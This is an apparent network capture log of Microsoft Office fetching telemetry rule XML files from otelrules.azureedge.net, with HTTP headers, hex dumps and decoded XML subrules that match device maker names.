                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: e4103400-101e-008e-08d4-45cf88000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010012Z-1746fd949bd54zxghC1EWRzre400000000n000000000vh5k
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:12 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    28192.168.2.64973313.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:11 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:12 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 499
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 167d53f1-601e-0084-47cc-456b3f000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010012Z-1746fd949bd9x4mhhC1EWRb76n00000000dg000000001gsa
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:12 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    29192.168.2.64973513.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:11 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:12 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 471
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: e7678828-401e-0078-7a85-434d34000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010012Z-174f78459684bddphC1EWRbht400000016gg000000004u8z
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:12 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    30192.168.2.64973613.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:12 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:12 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 2132beec-901e-00ac-46aa-42b69e000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010012Z-174f7845968swgbqhC1EWRmnb400000016t000000000nv5d
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:13 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    31192.168.2.64973713.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:13 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:13 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 494
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 8c022bf0-601e-0070-5bcb-45a0c9000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010013Z-174f78459685m244hC1EWRgp2c00000016eg00000000nq5s
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:13 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    32192.168.2.64974013.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:14 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:14 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:14 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: ddae3c3f-c01e-008d-3acb-452eec000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010014Z-1746fd949bdkw94lhC1EWRxuz400000000h000000000bfvs
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:14 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    33192.168.2.64973913.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:14 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:14 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 4626c155-d01e-0017-0ecc-45b035000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010014Z-1746fd949bdkw94lhC1EWRxuz400000000m000000000bzuk
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:14 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    34192.168.2.64973813.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:14 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:14 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 420
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 06c834e2-b01e-0001-1c8a-4346e2000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010014Z-174f78459684bddphC1EWRbht400000016b000000000q2f9
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:14 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    35192.168.2.64974113.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:14 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:15 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:15 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 486
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 85a33a74-901e-005b-1ccd-452005000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010015Z-1746fd949bdmv56chC1EWRypnn00000000g000000000aca2
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:15 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    36192.168.2.64974213.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:15 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
